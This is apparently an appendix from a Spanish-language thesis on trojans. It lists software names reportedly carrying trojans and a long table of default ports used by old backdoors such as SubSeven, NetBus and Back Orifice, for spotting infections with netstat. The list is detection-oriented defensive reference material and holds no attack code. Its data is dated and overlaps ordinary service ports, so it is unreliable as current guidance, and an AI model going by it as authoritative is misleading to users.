Meracl Hexocol 1.1 Web Resume 1.0
Meracl ID3 Tag Writer WebSaver
Meracl ImageMap Generator
3.4 Website Manager
Meracl MD Recorder 1.0 Web SurfACE 2.0
MetaMan WebStripper 1.05
Midnight Oil Solitaire 3.1 Web Word Search 1.0

152
MillenniuM BReaThe beta
0.3b WebZip 3.5
MiniMemo-Die
Cheatsdatenbank 9.0 WEB2SMS 1.0
MirNik Internet Finder 1.0 WebType 1.0
MonIRC 1.0.0.2 WhoIs Thingy
MoonWalker 2000 2.0.0 Win A Lotto
More Space 99 3.1 WinEdit 2000
MouseAssist-awaiting final
approval WinMP3Locator
MP3 Album Finder 1.3 Word+
MP3 Cat 1.0 Wordwright 1.0
MP3 Fiend 5.5 WorldChat Client
MP3 Grouppie 4.5 Worm
MP3INFO-Editor W3Filer
MP3 Mag-Net 1.0 www.devgames.com
MP3 Player 2000 6.2 xBlock 1.2
Your ESP Test
Zarko 1.9
Zarko3D
Zip Express 2000
Zip Up The Web Pro!
Zion 1.51

(Morgan, 2005)47.

153
 ANEXO D. LISTADO DE PUERTOS POR LOS QUE SE COMUNICAN LOS
TROYANOS

Este es un listado de puertos por el cual se comunican los troyanos. Con el

comando netstat -na se puede saber que puertos están abiertos en el momento de
una conexión. Cabe aclarar que en estos programas se pueden modificar el puerto
pero estos son con los que vienen por defecto en cada uno.

port 1 (UDP) - Sockets des Troie

port 2 Death
port 20 Senna Spy FTP server
port 21 Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark
FTP, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net
Administrator, Ramen, Senna Spy FTP server, The Flu, Traitor 21, WebEx,
WinCrash

port 22 Shaft
port 23 Fire HacKer, Tiny Telnet Server - TTS, Truva Atl
port 25 Ajan, Antigen, Barok, Email Password Sender - EPS, EPS II, Gip, Gris,
Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail
Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan,
Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy

port 30 Agent 40421

port 31 Agent 31, Hackers Paradise, Masters Paradise
port 41 DeepThroat, Foreplay
port 48 DRAT
port 50 DRAT
port 58 DMSetup
port 59 DMSetup
port 79 CDK, Firehotcker
port 80 711 trojan (Seven Eleven), AckCmd, Back End, BackOrifice 2000 Plug-Ins,
Cafeini, CGI Backdoor, Executor, God Message, God Message Creator, Hooker,
IISworm, MTX, NCX, Reverse WWW Tunnel Backdoor, RingZero, Seeker, WAN
Remote, Web Server CT, WebDownloader

port 81 RemoConChubo
port 99 Hidden Port, NCX
port 110 ProMail trojan
port 113 Invisible Identd Deamon, Kazimas
port 119 Happy99
port 121 Attack Bot, God Message, JammerKillah
port 123 Net Controller

154
port 133 Farnaz
port 137 Chode
port 137 (UDP) - Msinit
port 138 Chode
port 139 Chode, God Message worm, Msinit, Netlog, Network, Qaz
port 142 NetTaxi
port 146 Infector
port 146 (UDP) - Infector
port 170 A-trojan
port 334 Backage
port 411 Backage
port 420 Breach, Incognito
port 421 TCP Wrappers trojan
port 455 Fatal Connections
port 456 Hackers Paradise
port 513 Grlogin
port 514 RPC Backdoor
port 531 Net666, Rasmin
port 555 711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero,
Phase-0, Stealth Spy
port 605 Secret Service
port 666 Attack FTP, Back Construction, BLA trojan, Cain & Abel, NokNok, Satans
Back Door - SBD, ServU, Shadow Phyre, th3r1pp3rz (= Therippers)
port 667 SniperNet
port 669 DP trojan
port 692 GayOL
port 777 AimSpy, Undetected
port 808 WinHole
port 911 Dark Shadow
port 999 Deep Throat, Foreplay, WinSatan
port 1000 Der Späher / Der Spaeher, Direct Connection
port 1001 Der Späher / Der Spaeher, Le Guardien, Silencer, WebEx
port 1010 Doly Trojan
port 1011 Doly Trojan
port 1012 Doly Trojan
port 1015 Doly Trojan
port 1016 Doly Trojan
port 1020 Vampire
port 1024 Jade, Latinus, NetSpy
port 1025 Remote Storm
port 1025 (UDP) - Remote Storm
port 1035 Multidropper
port 1042 BLA trojan
port 1045 Rasmin
port 1049 /sbin/initd

155
port 1050 MiniCommand
port 1053 The Thief
port 1054 AckCmd
port 1080 WinHole
port 1081 WinHole
port 1082 WinHole
port 1083 WinHole
port 1090 Xtreme
port 1095 Remote Administration Tool - RAT
port 1097 Remote Administration Tool - RAT
port 1098 Remote Administration Tool - RAT
port 1099 Blood Fest Evolution, Remote Administration Tool - RAT
port 1150 Orion
port 1151 Orion
port 1170 Psyber Stream Server - PSS, Streaming Audio Server, Voice
port 1200 (UDP) - NoBackO
port 1201 (UDP) - NoBackO
port 1207 SoftWAR
port 1208 Infector
port 1212 Kaos
port 1234 SubSevenJavaclient, Ultors Trojan
port 1243 BackDoor-G, SubSeven, SubSevenApocalypse, Tiles
port 1245 VooDoo Doll
port 1255 Scarab
port 1256 Project nEXT
port 1269 Matrix
port 1272 TheMatrix
port 1313 NETrojan
port 1338 Millenium Worm
port 1349 Bo dll
port 1394 GoFriller, Backdoor G-1
port 1441 Remote Storm
port 1492 FTP99CMP
port 1524 Trinoo
port 1568 Remote Hack
port 1600 Direct Connection, Shivka-Burka
port 1703 Exploiter
port 1777 Scarab
port 1807 SpySender
port 1966 Fake FTP
port 1967 WM FTP Server
port 1969 OpC BO
port 1981 Bowl, Shockrave
port 1999 Back Door, SubSeven, TransScout

156
port 2000 Der Späher / Der Spaeher, Insane Network, Last 2000, Remote Explorer
2000, Senna Spy Trojan Generator
port 2001 Der Späher / Der Spaeher, Trojan Cow
port 2023 Ripper Pro
port 2080 WinHole
port 2115 Bugs
port 2130 (UDP) - Mini Backlash
port 2140 The Invasor
port 2140 (UDP) - Deep Throat, Foreplay
port 2155 Illusion Mailer
port 2255 Nirvana
port 2283 Hvl RAT
port 2300 Xplorer
port 2311 Studio 54
port 2330 Contact
port 2331 Contact
port 2332 Contact
port 2333 Contact
port 2334 Contact
port 2335 Contact
port 2336 Contact
port 2337 Contact
port 2338 Contact
port 2339 Contact, Voice Spy
port 2339 (UDP) - Voice Spy
port 2345 Doly Trojan
port 2565 Striker trojan
port 2583 WinCrash
port 2600 Digital RootBeer
port 2716 The Prayer
port 2773 Subseven, SubSeven2.1Gold
port 2774 SubSeven, Sub Seven 2.1 gold
port 2801 Phineas Phucker
port 2989 (UDP) - Remote Administration Tool - RAT
port 3000 Remote Shut
port 3024 WinCrash
port 3031 Microspy
port 3128 Reverse WWW Tunnel Backdoor, RingZero
port 3129 Masters Paradise
port 3150 The Invasor
port 3150 (UDP) - Deep Throat, Foreplay, Mini Backlash
port 3456 Terror trojan
port 3459 Eclipse 2000, Sanctuary
port 3700 Portal of Doom
port 3777 PsychWard

157
port 3791 Total Solar Eclypse
port 3801 Total Solar Eclypse
port 4000 SkyDance
port 4092 WinCrash
port 4242 Virtual Hacking Machine - VHM
port 4321 BoBo
port 4444 Prosiak, Swift Remote
port 4567 File Nail
port 4590 ICQ Trojan
port 4950 ICQ Trogen (Lm)
port 5000 Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Sockets des Troie
port 5001 Back Door Setup, Sockets des Troie
port 5002 cd00r, Shaft
port 5010 Solo
port 5011 One of the Last Trojans - OOTLT, One of the Last Trojans - OOTLT,
modified
port 5025 WM Remote KeyLogger
port 5031 Net Metropolitan
port 5032 Net Metropolitan
port 5321 Firehotcker
port 5333 Backage, NetDemon
port 5343 wCrat - WC Remote Administration Tool
port 5400 Back Construction, Blade Runner
port 5401 Back Construction, Blade Runner
port 5402 Back Construction, Blade Runner
port 5512 Illusion Mailer
port 5534 The Flu
port 5550 Xtcp
port 5555 ServeMe
port 5556 BO Facil
port 5557 BO Facil
port 5569 Robo-Hack
port 5637 PC Crasher
port 5638 PC Crasher
port 5742 WinCrash
port 5760 Portmap Remote Root Linux Exploit
port 5880 Y3K RAT
port 5882 Y3K RAT
port 5882 (UDP) - Y3K RAT
port 5888 Y3K RAT
port 5888 (UDP) - Y3K RAT
port 5889 Y3K RAT
port 6000 The Thing
port 6006 Bad Blood
port 6272 Secret Service

158
port 6400 The Thing
port 6661 TEMan, Weia-Meia
port 6666 Dark Connection Inside, NetBus worm
port 6667 Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8,
Trinity, WinSatan
port 6669 Host Control, Vampire
port 6670 BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame
port 6711 BackDoor-G, SubSeven, VP Killer
port 6712 Funny trojan, SubSeven
port 6713 SubSeven
port 6723 Mstream
port 6771 Deep Throat, Foreplay
port 6776 2000 Cracks, BackDoor-G, SubSeven, VP Killer
port 6838 (UDP) - Mstream
port 6883 Delta Source DarkStar (??)
port 6912 Shit Heep
port 6939 Indoctrination
port 6969 GateCrasher, IRC 3, Net Controller, Priority
port 6970 GateCrasher
port 7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven,
SubSeven 2.1 Gold
port 7001 Freak88, Freak2k
port 7215 SubSeven, SubSeven 2.1 Gold
port 7300 NetMonitor
port 7301 NetMonitor
port 7306 NetMonitor
port 7307 NetMonitor
port 7308 NetMonitor
port 7424 Host Control
port 7424 (UDP) - Host Control
port 7597 Qaz
port 7626 Glacier
port 7777 God Message, Tini
port 7789 Back Door Setup, ICKiller
port 7891 The ReVeNgEr
port 7983 Mstream
port 8080 Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor,
RingZero
port 8787 Back Orifice 2000
port 8988 BacHack
port 8989 Rcon, Recon, Xcon
port 9000 Netministrator
port 9325 (UDP) - Mstream
port 9400 InCommand
port 9872 Portal of Doom

159
port 9873 Portal of Doom
port 9874 Portal of Doom
port 9875 Portal of Doom
port 9876 Cyber Attacker, Rux
port 9878 TransScout
port 9989 Ini-Killer
port 9999 The Prayer
port 10000 OpwinTRojan
port 10005 OpwinTRojan
port 10067 (UDP) - Portal of Doom
port 10085 Syphillis
port 10086 Syphillis
port 10100 Control Total, Gift trojan
port 10101 BrainSpy, Silencer
port 10167 (UDP) - Portal of Doom
port 10520 Acid Shivers
port 10528 Host Control
port 10607 Coma
port 10666 (UDP) - Ambush
port 11000 Senna Spy Trojan Generator
port 11050 Host Control
port 11051 Host Control
port 11223 Progenic trojan, Secret Agent
port 12076 Gjamer
port 12223 Hack´99 KeyLogger
port 12345 Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp_client.c,
icmp_pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, Whack
Job, X-bill

port 12346 Fat Bitch trojan, GabanBus, NetBus, X-bill

port 12349 BioNet
port 12361 Whack-a-mole
port 12362 Whack-a-mole
port 12363 Whack-a-mole
port 12623 (UDP) - DUN Control
port 12624 ButtMan
port 12631 Whack Job
port 12754 Mstream
port 13000 Senna Spy Trojan Generator, Senna Spy Trojan Generator
port 13010 Hacker Brasil - HBR
port 13013 PsychWard
port 13014 PsychWard
port 13223 Hack´99 KeyLogger
port 13473 Chupacabra
port 14500 PC Invader

160
port 14501 PC Invader
port 14502 PC Invader
port 14503 PC Invader
port 15000 NetDemon
port 15092 Host Control
port 15104 Mstream
port 15382 SubZero
port 15858 CDK
port 16484 Mosucker
port 16660 Stacheldraht
port 16772 ICQ Revenge
port 16959 SubSeven, Subseven 2.1.4 DefCon 8
port 16969 Priority
port 17166 Mosaic
port 17300 Kuang2 the virus
port 17449 Kid Terror
port 17499 CrazzyNet
port 17500 CrazzyNet
port 17569 Infector
port 17593 Audiodoor
port 17777 Nephron
port 18753 (UDP) - Shaft
port 19864 ICQ Revenge
port 20000 Millenium
port 20001 Millenium, Millenium (Lm)
port 20002 AcidkoR
port 20005 Mosucker
port 20023 VP Killer
port 20034 NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whack Job
port 20203 Chupacabra
port 20331 BLA trojan
port 20432 Shaft
port 20433 (UDP) - Shaft
port 21544 GirlFriend, Kid Terror
port 21554 Exploiter, Kid Terror, Schwindler, Winsp00fer
port 22222 Donald Dick, Prosiak, Ruler, RUX The TIc.K
port 23005 NetTrash
port 23006 NetTrash
port 23023 Logged
port 23032 Amanda
port 23432 Asylum
port 23456 Evil FTP, Ugly FTP, Whack Job
port 23476 Donald Dick
port 23476 (UDP) - Donald Dick
port 23477 Donald Dick

161
port 23777 InetSpy
port 24000 Infector
port 25685 Moonpie
port 25686 Moonpie
port 25982 Moonpie
port 26274 (UDP) - Delta Source
port 26681 Voice Spy
port 27374 Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven
2.1.4 DefCon 8, SubSeven Muie, Ttfloader
port 27444 (UDP) - Trinoo
port 27573 SubSeven
port 27665 Trinoo
port 28678 Exploiter
port 29104 NetTrojan
port 29369 ovasOn
port 29891 The Unexplained
port 30000 Infector
port 30001 ErrOr32
port 30003 Lamers Death
port 30029 AOL trojan
port 30100 NetSphere
port 30101 NetSphere
port 30102 NetSphere
port 30103 NetSphere
port 30103 (UDP) - NetSphere
port 30133 NetSphere
port 30303 Sockets des Troie
port 30947 Intruse
port 30999 Kuang2
port 31335 Trinoo
port 31336 Bo Whack, Butt Funnel
port 31337 Back Fire, BackOrifice 1.20 patches, BackOrifice (Lm), BackOrifice
russian, Baron Night, Beeone, BO client, BO Facil, BO spy, BO2, cron / crontab,
Freak88, Freak2k, icmp_pipe.c, Sockdmini

port 31337 (UDP) - BackOrifice, Deep BO

port 31338 Back Orifice, Butt Funnel, NetSpy (DK)
port 31338 (UDP) - Deep BO
port 31339 NetSpy (DK)
port 31666 BOWhack
port 31785 Hack´a´Tack
port 31787 Hack´a´Tack
port 31788 Hack´a´Tack
port 31789 (UDP) - Hack´a´Tack
port 31790 Hack´a´Tack

162
port 31791 (UDP) - Hack´a´Tack
port 31792 Hack´a´Tack
port 32001 Donald Dick
port 32100 Peanut Brittle, Project nEXT
port 32418 Acid Battery
port 33270 Trinity
port 33333 Blakharaz, Prosiak
port 33577 Son of PsychWard
port 33777 Son of PsychWard
port 33911 Spirit 2000, Spirit 2001
port 34324 Big Gluck, TN
port 34444 Donald Dick
port 34555 (UDP) - Trinoo (for Windows)
port 35555 (UDP) - Trinoo (for Windows)
port 37237 Mantis
port 37651 Yet Another Trojan - YAT
port 40412 The Spy
port 40421 Agent 40421, Masters Paradise
port 40422 Masters Paradise
port 40423 Masters Paradise
port 40425 Masters Paradise
port 40426 Masters Paradise
port 41337 Storm
port 41666 Remote Boot Tool - RBT, Remote Boot Tool - RBT
port 44444 Prosiak
port 44575 Exploiter
port 47262 (UDP) - Delta Source
port 49301 OnLine KeyLogger
port 50130 Enterprise
port 50505 Sockets des Troie
port 50766 Fore, Schwindler
port 51966 Cafeini
port 52317 Acid Battery 2000
port 53001 Remote Windows Shutdown - RWS
port 54283 SubSeven, SubSeven 2.1 Gold
port 54320 Back Orifice 2000
port 54321 BackOrifice 2000, School Bus
port 55165 File Manager trojan, File Manager trojan, WM Trojan Generator
port 55166 WM Trojan Generator
port 57341 NetRaider
port 58339 Butt Funnel
port 60000 DeepThroat, Foreplay, Sockets des Troie
port 60001 Trinity
port 60068 Xzip 6000068
(El Hacker, 2005)21.

163